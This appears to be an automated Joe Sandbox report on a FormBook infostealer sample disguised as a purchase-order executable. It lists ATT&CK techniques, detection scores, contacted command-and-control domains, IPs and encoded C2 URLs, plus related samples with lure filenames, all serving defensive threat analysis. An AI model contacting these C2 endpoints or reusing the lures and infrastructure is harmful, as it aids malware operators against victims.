Source: Yara match	File source: 00000002.00000002.394506656.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.477446338.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.753541101.0000000001E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.753341793.0000000000240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.394472558.0000000000160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.753316396.0000000000130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.753330363.00000000001F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.753525101.0000000004720000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.395236048.0000000002B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	312 Process Injection	2 Virtualization/Sandbox Evasion	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Email Collection	5 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	312 Process Injection	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Browser Session Hijacking	5 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	1 Data from Local System	5 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	114 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PO #86637.exe	39%	ReversingLabs	Win32.Trojan.Formbooks
PO #86637.exe	29%	Virustotal		Browse
PO #86637.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\sqlite3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\sqlite3.dll	0%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
www.elsupertodo.net	0%	Virustotal	Browse
webredir.vip.gandi.net	0%	Virustotal	Browse
www.chinaen.org	0%	Virustotal	Browse
bola88site.one	0%	Virustotal	Browse
www.dyme.tech	0%	Virustotal	Browse
www.sqlite.org	0%	Virustotal	Browse
www.kexweb.top	2%	Virustotal	Browse
natroredirect.natrocdn.com	0%	Virustotal	Browse
omexai.info	0%	Virustotal	Browse
www.tekilla.wtf	0%	Virustotal	Browse
www.omexai.info	0%	Virustotal	Browse
www.woshop.online	0%	Virustotal	Browse
www.bola88site.one	0%	Virustotal	Browse
www.jobworklanka.online	2%	Virustotal	Browse
www.kxshopmr.store	0%	Virustotal	Browse
jobworklanka.online	2%	Virustotal	Browse
www.arlon-commerce.com	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.kexweb.top/3bdq/	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
http://www.omexai.info/7xi5/?A8_pSPdX=ixI46zwDNWOoK0d6d9oZupQDSeTrSlA+qsFL+v4hzxqFGT4p3+8W5ZPgGBQ8bVBflzmq/wZaho2FRO9YF6xYKTPjOQanpFHctYNa2gQELNdW5L2bG4NjRgFmI2Bw&38R0=jHY4nFvHAVc8	100%	Avira URL Cloud	malware
http://www.dyme.tech/h7lb/	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
http://www.languagemodel.pro/nxfn/?38R0=jHY4nFvHAVc8&A8_pSPdX=6j3CvtUhPdUgNSN69j0+QWfnbreQhpE9GdmFQzyR6PqyVz5YOV5rsMCr01dDJ3tx7/JxUqdZcV7VgtOZ6IqGV2qYbE9Zg8C0OLxYd5Fblj7aWglYFvr22nOv484K	0%	Avira URL Cloud	safe
http://www.kexweb.top/3bdq/?A8_pSPdX=mPDvA1qI3GiuntP60f/rUorn47smR4p61+amzFfuWlPCagi05gb6jW0dSPIhEEY5GlOsioyOqKhT4H0OrZxilUUqq6EOplLI1qPNmT9wcl66RlEMoF/NT9bmJ4pJ&38R0=jHY4nFvHAVc8	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
http://www.sqlite.org/2022/sqlite-dll-win32-x86-3370000.zip	0%	Avira URL Cloud	safe
http://www.chinaen.org	0%	Avira URL Cloud	safe
http://www.languagemodel.pro/nxfn/	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
http://www.sqlite.org/2021/sqlite-dll-win32-x86-3360000.zip	0%	Avira URL Cloud	safe
http://www.sqlite.org/2022/sqlite-dll-win32-x86-3370000.zip	0%	Virustotal		Browse
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Virustotal		Browse
http://www.kexweb.top/3bdq/	2%	Virustotal		Browse
http://www.sqlite.org/2021/sqlite-dll-win32-x86-3360000.zip	0%	Virustotal		Browse
http://www.chinaen.org	0%	Virustotal		Browse
http://www.languagemodel.pro/nxfn/	2%	Virustotal		Browse
http://www.chinaen.org/mquw/?A8_pSPdX=9VhEAk+nBcRFJItaXX6Ik3fcc5jQUDHEZy86ZzmkaEauDk+ByEDF1wffSRJdehvmJ40J6w+Nyel0VlcWIHUxviiTn/v8hhiufLl732sk/Kf2CDDROFQVvvK4n67B&38R0=jHY4nFvHAVc8	0%	Avira URL Cloud	safe
http://www.nobartv6.website/pp43/?38R0=jHY4nFvHAVc8&A8_pSPdX=/yzCblrJsERuqgz3jNPVh3QXFKomWtIu	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
https://www.gandi.net/en/domain	0%	Avira URL Cloud	safe
http://www.chinaen.org/mquw/	0%	Avira URL Cloud	safe
https://www.elsupertodo.net/2jit/?A8_pSPdX=iS4P4oRSl8BXKzGHILRVAF4LAAl1IYK6JXAZlPSQukWhX6ryYmutxv	100%	Avira URL Cloud	malware
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	0%	Avira URL Cloud	safe
https://whois.gandi.net/en/results?search=languagemodel.pro	0%	Avira URL Cloud	safe
http://www.jobworklanka.online/ikh0/?38R0=jHY4nFvHAVc8&A8_pSPdX=lvx8xqKuEeZXr5ITqJXMOhHudBjI1DEsZETVjxqXK0Zv2i3/Db6zHLOVaJTsGghSb2zUIGDfA5rd637aCh7mkrK3VrsyjhlNST0gb4jcYSXv3tE6yFdk4d8M6F9v	0%	Avira URL Cloud	safe
http://www.nobartv6.website/pp43/	0%	Avira URL Cloud	safe
http://www.tekilla.wtf/fpzw/	0%	Avira URL Cloud	safe
https://whois.gandi.net/en/results?search=languagemodel.pro	0%	Virustotal		Browse
https://www.gandi.net/en/domain	0%	Virustotal		Browse
https://www.google.com/favicon.ico	0%	Avira URL Cloud	safe
http://www.omexai.info/7xi5/	100%	Avira URL Cloud	malware
https://ac.ecosia.org/autocomplete?q=	0%	Avira URL Cloud	safe
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	0%	Virustotal		Browse
http://www.tekilla.wtf/fpzw/	2%	Virustotal		Browse
http://www.mizuquan.top/e0nr/	0%	Avira URL Cloud	safe
http://www.sailnway.net/lrst/?A8_pSPdX=mDrmkSN/AS2kB6lxw6968UvRuBo2CnIhmXXSSGppVfotDkdoE42/hFN7L43edTGNkqeamvN9p79evl2jiLPZXHCZACLKMeULs3Bzxtr9WkFRvQNQJByT+dkA1Yhl&38R0=jHY4nFvHAVc8	0%	Avira URL Cloud	safe
http://www.omexai.info/7xi5/	7%	Virustotal		Browse
https://www.google.com/favicon.ico	0%	Virustotal		Browse
http://www.bola88site.one/3qit/	0%	Avira URL Cloud	safe
https://ac.ecosia.org/autocomplete?q=	0%	Virustotal		Browse
http://www.dyme.tech/h7lb/?A8_pSPdX=RbPHaORuq3VLsIvFE6xZ51H5/nq3Q2KtxUtCmsRXGI6jytYd3WVHUDgAs1Bl5qF7JnhTmlf74Hij29gRJq6necArhbC5i9d55ywI/6qv4tUNL5QxhF6ks96lGiUd&38R0=jHY4nFvHAVc8	0%	Avira URL Cloud	safe
http://www.jobworklanka.online/ikh0/	0%	Avira URL Cloud	safe
http://www.nobartv6.website/pp43/?38R0=jHY4nFvHAVc8&A8_pSPdX=/yzCblrJsERuqgz3jNPVh3QXFKomWtIu+6Zh8/8YqB01FuO+DLXf0tlFHyR0DQ5uHVkhjJ85CmXcOpGqCMWGlbfbEQkZLHfLKViDcC/h13rX0D3njlQFWG5ZKSyE	0%	Avira URL Cloud	safe
http://www.sailnway.net/lrst/	0%	Avira URL Cloud	safe
http://www.bola88site.one/3qit/	2%	Virustotal		Browse
http://www.elsupertodo.net/2jit/?A8_pSPdX=iS4P4oRSl8BXKzGHILRVAF4LAAl1IYK6JXAZlPSQukWhX6ryYmutxv+d9ucM3CL7kJipDUdSquhSox7e6HgmYI08bz3IIKp3NcTDvEuGYqTKDQ0c7nXfRnBNa46x&38R0=jHY4nFvHAVc8	100%	Avira URL Cloud	malware
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	Avira URL Cloud	safe
http://www.tekilla.wtf/fpzw/?38R0=jHY4nFvHAVc8&A8_pSPdX=vk5QQsijTkj0pfF2YfQUWsKzZGFZZr+gcHfTrVh5yCT2NPNs5yeYQ+2oymVMaPQsdmNH36JHgT5sE/S60pHG7YfuD+9f6MY/b5+Sh71Gd/3RqNcTHTmfk9YtdJYY	0%	Avira URL Cloud	safe
http://www.sqlite.org/copyright.html.	0%	Avira URL Cloud	safe
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	Avira URL Cloud	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	Virustotal		Browse
http://www.sqlite.org/copyright.html.	0%	Virustotal		Browse
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	Virustotal		Browse

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.elsupertodo.net	148.72.152.174	true	true	0%, Virustotal, Browse	unknown
webredir.vip.gandi.net	217.70.184.50	true	true	0%, Virustotal, Browse	unknown
www.chinaen.org	188.114.96.3	true	true	0%, Virustotal, Browse	unknown
bola88site.one	172.96.191.39	true	true	0%, Virustotal, Browse	unknown
www.dyme.tech	13.248.169.48	true	true	0%, Virustotal, Browse	unknown
jobworklanka.online	91.184.0.200	true	true	2%, Virustotal, Browse	unknown
natroredirect.natrocdn.com	85.159.66.93	true	true	0%, Virustotal, Browse	unknown
www.nobartv6.website	103.224.182.242	true	true		unknown
www.kexweb.top	63.250.47.40	true	true	2%, Virustotal, Browse	unknown
www.mizuquan.top	43.242.202.169	true	true		unknown
redirect.3dns.box	172.191.244.62	true	true		unknown
www.sqlite.org	45.33.6.223	true	false	0%, Virustotal, Browse	unknown
omexai.info	3.33.130.190	true	true	0%, Virustotal, Browse	unknown
www.tekilla.wtf	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.omexai.info	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.sailnway.net	unknown	unknown	true		unknown
www.woshop.online	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.languagemodel.pro	unknown	unknown	true		unknown
www.bola88site.one	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.jobworklanka.online	unknown	unknown	true	2%, Virustotal, Browse	unknown
www.arlon-commerce.com	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.kxshopmr.store	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.dyme.tech/h7lb/	true	Avira URL Cloud: safe	unknown
http://www.kexweb.top/3bdq/	true	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.omexai.info/7xi5/?A8_pSPdX=ixI46zwDNWOoK0d6d9oZupQDSeTrSlA+qsFL+v4hzxqFGT4p3+8W5ZPgGBQ8bVBflzmq/wZaho2FRO9YF6xYKTPjOQanpFHctYNa2gQELNdW5L2bG4NjRgFmI2Bw&38R0=jHY4nFvHAVc8	true	Avira URL Cloud: malware	unknown
http://www.kexweb.top/3bdq/?A8_pSPdX=mPDvA1qI3GiuntP60f/rUorn47smR4p61+amzFfuWlPCagi05gb6jW0dSPIhEEY5GlOsioyOqKhT4H0OrZxilUUqq6EOplLI1qPNmT9wcl66RlEMoF/NT9bmJ4pJ&38R0=jHY4nFvHAVc8	true	Avira URL Cloud: safe	unknown
http://www.languagemodel.pro/nxfn/?38R0=jHY4nFvHAVc8&A8_pSPdX=6j3CvtUhPdUgNSN69j0+QWfnbreQhpE9GdmFQzyR6PqyVz5YOV5rsMCr01dDJ3tx7/JxUqdZcV7VgtOZ6IqGV2qYbE9Zg8C0OLxYd5Fblj7aWglYFvr22nOv484K	true	Avira URL Cloud: safe	unknown
http://www.sqlite.org/2022/sqlite-dll-win32-x86-3370000.zip	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.languagemodel.pro/nxfn/	true	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.sqlite.org/2021/sqlite-dll-win32-x86-3360000.zip	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.chinaen.org/mquw/?A8_pSPdX=9VhEAk+nBcRFJItaXX6Ik3fcc5jQUDHEZy86ZzmkaEauDk+ByEDF1wffSRJdehvmJ40J6w+Nyel0VlcWIHUxviiTn/v8hhiufLl732sk/Kf2CDDROFQVvvK4n67B&38R0=jHY4nFvHAVc8	true	Avira URL Cloud: safe	unknown
http://www.chinaen.org/mquw/	true	Avira URL Cloud: safe	unknown
http://www.jobworklanka.online/ikh0/?38R0=jHY4nFvHAVc8&A8_pSPdX=lvx8xqKuEeZXr5ITqJXMOhHudBjI1DEsZETVjxqXK0Zv2i3/Db6zHLOVaJTsGghSb2zUIGDfA5rd637aCh7mkrK3VrsyjhlNST0gb4jcYSXv3tE6yFdk4d8M6F9v	true	Avira URL Cloud: safe	unknown
http://www.nobartv6.website/pp43/	true	Avira URL Cloud: safe	unknown
http://www.tekilla.wtf/fpzw/	true	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.omexai.info/7xi5/	true	7%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.mizuquan.top/e0nr/	true	Avira URL Cloud: safe	unknown
http://www.sailnway.net/lrst/?A8_pSPdX=mDrmkSN/AS2kB6lxw6968UvRuBo2CnIhmXXSSGppVfotDkdoE42/hFN7L43edTGNkqeamvN9p79evl2jiLPZXHCZACLKMeULs3Bzxtr9WkFRvQNQJByT+dkA1Yhl&38R0=jHY4nFvHAVc8	true	Avira URL Cloud: safe	unknown
http://www.bola88site.one/3qit/	true	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.dyme.tech/h7lb/?A8_pSPdX=RbPHaORuq3VLsIvFE6xZ51H5/nq3Q2KtxUtCmsRXGI6jytYd3WVHUDgAs1Bl5qF7JnhTmlf74Hij29gRJq6necArhbC5i9d55ywI/6qv4tUNL5QxhF6ks96lGiUd&38R0=jHY4nFvHAVc8	true	Avira URL Cloud: safe	unknown
http://www.jobworklanka.online/ikh0/	true	Avira URL Cloud: safe	unknown
http://www.nobartv6.website/pp43/?38R0=jHY4nFvHAVc8&A8_pSPdX=/yzCblrJsERuqgz3jNPVh3QXFKomWtIu+6Zh8/8YqB01FuO+DLXf0tlFHyR0DQ5uHVkhjJ85CmXcOpGqCMWGlbfbEQkZLHfLKViDcC/h13rX0D3njlQFWG5ZKSyE	true	Avira URL Cloud: safe	unknown
http://www.sailnway.net/lrst/	true	Avira URL Cloud: safe	unknown
http://www.elsupertodo.net/2jit/?A8_pSPdX=iS4P4oRSl8BXKzGHILRVAF4LAAl1IYK6JXAZlPSQukWhX6ryYmutxv+d9ucM3CL7kJipDUdSquhSox7e6HgmYI08bz3IIKp3NcTDvEuGYqTKDQ0c7nXfRnBNa46x&38R0=jHY4nFvHAVc8	true	Avira URL Cloud: malware	unknown
http://www.tekilla.wtf/fpzw/?38R0=jHY4nFvHAVc8&A8_pSPdX=vk5QQsijTkj0pfF2YfQUWsKzZGFZZr+gcHfTrVh5yCT2NPNs5yeYQ+2oymVMaPQsdmNH36JHgT5sE/S60pHG7YfuD+9f6MY/b5+Sh71Gd/3RqNcTHTmfk9YtdJYY	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	netbtugc.exe, 00000004.00000003.465330619.0000000006171000.00000004.00000020.00020000.00000000.sdmp, 01194HH4.4.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	netbtugc.exe, 00000004.00000003.465330619.0000000006171000.00000004.00000020.00020000.00000000.sdmp, 01194HH4.4.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.chinaen.org	fhSlYsGoxBSrK.exe, 00000005.00000002.753541101.0000000001EE5000.00000040.80000000.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.nobartv6.website/pp43/?38R0=jHY4nFvHAVc8&A8_pSPdX=/yzCblrJsERuqgz3jNPVh3QXFKomWtIu	fhSlYsGoxBSrK.exe, 00000005.00000002.753610355.000000000429C000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	netbtugc.exe, 00000004.00000003.465330619.0000000006171000.00000004.00000020.00020000.00000000.sdmp, 01194HH4.4.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	netbtugc.exe, 00000004.00000003.465330619.0000000006171000.00000004.00000020.00020000.00000000.sdmp, 01194HH4.4.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.gandi.net/en/domain	netbtugc.exe, 00000004.00000002.753781292.0000000001F50000.00000004.10000000.00040000.00000000.sdmp, fhSlYsGoxBSrK.exe, 00000005.00000002.753610355.0000000003930000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.elsupertodo.net/2jit/?A8_pSPdX=iS4P4oRSl8BXKzGHILRVAF4LAAl1IYK6JXAZlPSQukWhX6ryYmutxv	netbtugc.exe, 00000004.00000002.753781292.0000000001908000.00000004.10000000.00040000.00000000.sdmp, fhSlYsGoxBSrK.exe, 00000005.00000002.753610355.00000000032E8000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.477475123.0000000000DB8000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://whois.gandi.net/en/results?search=languagemodel.pro	netbtugc.exe, 00000004.00000002.753781292.0000000001F50000.00000004.10000000.00040000.00000000.sdmp, fhSlYsGoxBSrK.exe, 00000005.00000002.753610355.0000000003930000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/favicon.ico	01194HH4.4.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	netbtugc.exe, 00000004.00000003.465330619.0000000006171000.00000004.00000020.00020000.00000000.sdmp, 01194HH4.4.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	netbtugc.exe, 00000004.00000003.465330619.0000000006171000.00000004.00000020.00020000.00000000.sdmp, 01194HH4.4.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.sqlite.org/copyright.html.	netbtugc.exe, 00000004.00000002.754382452.0000000061ECD000.00000008.00000001.01000000.00000007.sdmp, sqlite3.dll.4.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	netbtugc.exe, 00000004.00000003.465330619.0000000006171000.00000004.00000020.00020000.00000000.sdmp, 01194HH4.4.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
45.33.6.223	www.sqlite.org	United States	63949	LINODE-APLinodeLLCUS	false
63.250.47.40	www.kexweb.top	United States	22612	NAMECHEAP-NETUS	true
13.248.169.48	www.dyme.tech	United States	16509	AMAZON-02US	true
91.184.0.200	jobworklanka.online	Netherlands	197902	HOSTNETNL	true
103.224.182.242	www.nobartv6.website	Australia	133618	TRELLIAN-AS-APTrellianPtyLimitedAU	true
148.72.152.174	www.elsupertodo.net	United States	30083	AS-30083-GO-DADDY-COM-LLCUS	true
85.159.66.93	natroredirect.natrocdn.com	Turkey	34619	CIZGITR	true
172.191.244.62	redirect.3dns.box	United States	7018	ATT-INTERNET4US	true
172.96.191.39	bola88site.one	Canada	59253	LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG	true
188.114.96.3	www.chinaen.org	European Union	13335	CLOUDFLARENETUS	true
217.70.184.50	webredir.vip.gandi.net	France	29169	GANDI-ASDomainnameregistrar-httpwwwgandinetFR	true
3.33.130.190	omexai.info	United States	8987	AMAZONEXPANSIONGB	true
43.242.202.169	www.mizuquan.top	Hong Kong	40065	CNSERVERSUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1504651
Start date and time:	2024-09-05 09:03:52 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 14s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PO #86637.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/11@16/13
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
Excluded IPs from analysis (whitelisted): 92.204.80.11
Excluded domains from analysis (whitelisted): whois-unverified.domainbox.akadns.net
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
03:05:39	API Interceptor	7386230x Sleep call for process: netbtugc.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
45.33.6.223	Paul Meeting Proposal and Schedule.xls	Get hash	malicious	FormBook	Browse	www.sqlite.org/2017/sqlite-dll-win32-x86-3170000.zip
	Paul Agrotis List.xls	Get hash	malicious	FormBook	Browse	www.sqlite.org/2019/sqlite-dll-win32-x86-3300000.zip
	SecuriteInfo.com.Trojan.GenericKD.73942994.9810.18396.xlsx	Get hash	malicious	FormBook	Browse	www.sqlite.org/2018/sqlite-dll-win32-x86-3260000.zip
	350.xls	Get hash	malicious	FormBook	Browse	www.sqlite.org/2020/sqlite-dll-win32-x86-3320000.zip
	SecuriteInfo.com.Exploit.CVE-2017-11882.123.29807.9267.rtf	Get hash	malicious	FormBook	Browse	www.sqlite.org/2018/sqlite-dll-win32-x86-3250000.zip
	Mac Purchase Order PO102935.xls	Get hash	malicious	FormBook	Browse	www.sqlite.org/2017/sqlite-dll-win32-x86-3200000.zip
	SecuriteInfo.com.PDF.Phishing.7B6B.tr.10532.1457.xlsx	Get hash	malicious	FormBook	Browse	www.sqlite.org/2021/sqlite-dll-win32-x86-3350000.zip
	AWB# 6290868304.docx.doc	Get hash	malicious	FormBook	Browse	www.sqlite.org/2017/sqlite-dll-win32-x86-3200000.zip
	PO AFHOR9301604.exe	Get hash	malicious	FormBook	Browse	www.sqlite.org/2019/sqlite-dll-win32-x86-3270000.zip
	RFQ-0122-07-2024.xls	Get hash	malicious	FormBook	Browse	www.sqlite.org/2017/sqlite-dll-win32-x86-3200000.zip
63.250.47.40	COTIZACION 290824.exe	Get hash	malicious	FormBook	Browse	www.kexweb.top/3bdq/
	ORDER_pdf.exe	Get hash	malicious	FormBook	Browse	www.kexweb.top/mfb2/
	ORDER_38746_pdf.exe	Get hash	malicious	FormBook	Browse	www.kexweb.top/mfb2/
13.248.169.48	SecuriteInfo.com.Win32.CrypterX-gen.29913.30159.exe	Get hash	malicious	FormBook	Browse	www.omlyes.com/h209/?Dxo=iZtTggBZfUEO+HC6YKHWriWWpmX0i4qAS7HiYOC76+2tWZxBemDORvlFY8KUijKDxbXK&mnSl=Txlh
	PDPUOIE76867 PDF.exe	Get hash	malicious	FormBook	Browse	www.intap.shop/he2a/?ZN9Ls=9rCTo2P0wPzDj0p&5jE=/Ua8ExDTUucouD7M2MREjCyHkUzXlcEX6KzIXilwzRyJg7omEuicfEdEyes3tq+sX5A8
	PO_987654345678.exe	Get hash	malicious	FormBook	Browse	www.healthsolutions.top/cent/?0z=mDcdcR8&Qd=l1qN2MMhbl/x2ijL+cYxGoEcoDCmCINS+YU1HxWhb8Kqe535lkNGafx30NgxGLIJJEStArUmzXIrZ0bzKO7vv1M79bDO++JJrrxc/WvjehfCDuj8XmxnNRs=
	COTIZACION 290824.exe	Get hash	malicious	FormBook	Browse	www.dyme.tech/h7lb/
	play.exe	Get hash	malicious	FormBook	Browse	www.astrocloud.shop/7mxg/
	INV20240828.exe	Get hash	malicious	FormBook	Browse	www.healthsolutions.top/cent/
	COM404 PDF.exe	Get hash	malicious	FormBook	Browse	www.opentelemetry.shop/he2a/?9r9Hc=ivWl&NtxTwXO=KCPTlsMcF8eqeRPoupc8NSnF5ATV37tgrRW1pEzwOBbcxu+G1NpS7ZYtf9ZA4e+ZQi383eqNlg==
	quotation.exe	Get hash	malicious	DarkTortilla, FormBook	Browse	www.somon.app/jys5/?pbM=rVxTT&lz=Gv2FWEuKupcxnbQ0F3wuClB9GaJm+HhnnRk0N+Y5EGHs9JmWyVRozS4hAZOY3TSoZ8xeM4DSbtugb4BFcxOd14Bplzi5QjmPlStqozPHXjG7lc9y/dalULA=
	rRFQ.bat.exe	Get hash	malicious	FormBook	Browse	www.study-in-nyc.online/elaa/
	REQUEST FOR QUOTATION.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.dyme.tech/pjne/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.dyme.tech	REQST_PRC 410240665_2024.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	REQST_PRC 410240.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	COTIZACION 290824.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	REQUEST FOR QUOTATION.exe	Get hash	malicious	FormBook, GuLoader	Browse	13.248.169.48
	INVG0088 LHV3495264 BL327291535V.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	DHL AWB TRACKING DETAILS.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	PURCHASE ORDER_330011 SEPTEMBER 2024.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	Atlas Copco- WEPCO.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
www.chinaen.org	Curriculum Vitae.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
webredir.vip.gandi.net	au1FjlRwFR.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
